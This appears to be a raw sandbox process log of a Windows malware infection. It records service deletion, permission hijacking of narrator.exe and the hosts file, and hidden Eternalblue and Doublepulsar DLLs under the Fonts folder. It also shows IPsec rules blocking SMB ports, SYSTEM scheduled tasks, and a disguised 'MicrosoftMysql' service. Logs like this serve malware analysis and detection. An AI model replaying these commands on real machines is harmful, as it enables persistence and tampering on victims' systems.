sc.exe sc delete MicrosoftMssql
2188net1.exe C:\Windows\system32\net1 stop MicrosoftMysql
2304cmd.exe "C:\Windows\system32\cmd.exe" /c del "C:\windows\inf\sp123.exe" > nul
2632takeown.exe takeown /f C:\Windows\system32\narrator.exe /a
3060cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2828cacls.exe cacls C:\Windows\system32\narrator.exe /g Administrators:f
2272cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2936cacls.exe cacls C:\Windows\system32\narrator.exe /e /g Users:r
2340cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2276cacls.exe cacls C:\Windows\system32\narrator.exe /e /g Administrators:r
3024cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2552cacls.exe cacls C:\Windows\system32\narrator.exe /e /d SERVICE
2072cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2960cacls.exe cacls C:\Windows\system32\narrator.exe /e /d "network service"
2096cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3112cacls.exe cacls C:\Windows\system32\narrator.exe /e /g system:r
3148attrib.exe C:\Windows\system32\attrib +s +h +r C:\Windows\Fonts\sqlser.exe
3256xsfxdel~.exe "C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe" "C:\windows\inf\vers.exe"
1800net1.exe C:\Windows\system32\net1 stop mssecsvc2.0
3056sc.exe sc delete mssecsvc2.0
2880sc.exe sc delete mssecsvc2.1
3048net1.exe C:\Windows\system32\net1 stop mssecsvc2.1
2736net1.exe C:\Windows\system32\net1 stop serivecs
2460sc.exe sc delete serivecs
2252net1.exe C:\Windows\system32\net1 stop WmiAppSrv
2652sc.exe sc delete WmiAppSrv
2804net1.exe C:\Windows\system32\net1 stop Bcdefg
2408sc.exe sc delete Bcdefg
2208net1.exe C:\Windows\system32\net1 stop WSSDPSRVS
2848sc.exe sc delete SSDPSRVS
2896takeown.exe takeown /f C:\Windows\system32\Drivers\etc\hosts /a
3020cacls.exe cacls C:\Windows\system32\Drivers\etc\hosts /g users:f
2992cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2424attrib.exe attrib -s -h -a -r C:\Windows\system32\Drivers\etc\hosts
2672attrib.exe attrib +s +h +a +r C:\Windows\system32\Drivers\etc\hosts
2480cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2544cacls.exe cacls C:\Windows\system32\Drivers\etc\hosts /d everyone
2796ipconfig.exe ipconfig /flushdns
3196sc.exe sc start PolicyAgent
3276sc.exe sc config PolicyAgent start= AUTO
3424netsh.exe netsh ipsec static del all
3492netsh.exe netsh ipsec static add policy name=Aliyun
3616netsh.exe netsh ipsec static add filterlist name=Allowlist
3700netsh.exe netsh ipsec static add filterlist name=denylist
3864netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
3972netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
4080netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
2684netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
3292netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
3384netsh.exe netsh ipsec static add filteraction name=Allow action=permit
3520netsh.exe netsh ipsec static add filteraction name=deny action=block
3612netsh.exe netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
3388netsh.exe netsh ipsec static set policy name=Aliyun assign=y
3780net1.exe C:\Windows\system32\net1 stop "MicrosoftMysql"
4032net1.exe C:\Windows\system32\net1 stop "MicrosoftMssql"
3268sc.exe sc delete "MicrosoftMysql"
3260sc.exe sc delete "MicrosoftMssql"
3448schtasks.exe schtasks /delete /tn At1 /f
3604schtasks.exe schtasks /delete /tn At2 /f
3652cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3600schtasks.exe schtasks /create /TN "At1" /TR "C:\Windows\Fonts\Mysql\nei.bat" /SC weekly /ST 11:30:00 /RU SYSTEM
4072cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3896schtasks.exe schtasks /create /TN "At2" /TR "C:\Windows\Fonts\Mysql\wai.bat" /SC daily /ST 01:00:00 /RU SYSTEM
3936takeown.exe takeown /f C:\Windows\Fonts\Mysql /a
3104attrib.exe attrib -s -h -r C:\Windows\Fonts\Mysql
3496cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3244cacls.exe cacls "C:\Windows\Fonts\Mysql" /g everyone:f
872takeown.exe takeown /f C:\Windows\Fonts\Mysql /a
1448attrib.exe attrib -s -h -r C:\Windows\Fonts\Mysql
3664cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3804cacls.exe cacls "C:\Windows\Fonts\Mysql" /g everyone:f
3884takeown.exe takeown /f C:\Windows\Fonts\Mysql /a
3128attrib.exe attrib -s -h -r C:\Windows\Fonts\Mysql
3288cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3608cacls.exe cacls "C:\Windows\Fonts\Mysql" /g everyone:f
3680cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4092cacls.exe cacls "C:\Windows\Fonts\Mysql" /g everyone:f
3308cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3720cacls.exe cacls "C:\Windows\Fonts\Mysql\*.*" /g everyone:f
1552PING.EXE ping 127.1 -n 3
3888attrib.exe attrib +s +h +r C:\Windows\Fonts\Mysql\Doublepulsar.dll
940attrib.exe attrib +s +h +r C:\Windows\Fonts\Mysql\Doublepulsar2.dll
2956attrib.exe attrib +s +h +r C:\Windows\Fonts\Mysql\Eternalblue.dll
3436attrib.exe attrib +s +h +r C:\Windows\Fonts\Mysql\Eternalblue2.dll
4040attrib.exe attrib +r C:\Windows\Fonts\Mysql\file.txt
2044net1.exe C:\Windows\system32\net1 stop "MicrosoftMysql"
2384net1.exe C:\Windows\system32\net1 stop "MicrosoftMssql"
2940svchost.exe svchost stop "MicrosoftFonts"
2040svchost.exe svchost stop "MicrosoftMysql"
1176sc.exe sc delete "MicrosoftMysql"
3644sc.exe sc delete "MicrosoftMssql"
204svchost.exe svchost install MicrosoftMysql "C:\Windows\Fonts\Mysql\cmd.bat"
3784svchost.exe svchost install MicrosoftMysql C:\Windows\Fonts\Mysql\cmd.bat
2076svchost.exe svchost install "MicrosoftMysql" C:\Windows\Fonts\Mysql\cmd.bat
3868PING.EXE ping 127.0.0.1 -n 20
1616PING.EXE ping 127.1 -n 7
3488wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\tem.vbs"
2504explorer.exe C:\Windows\Explorer.EXE
1236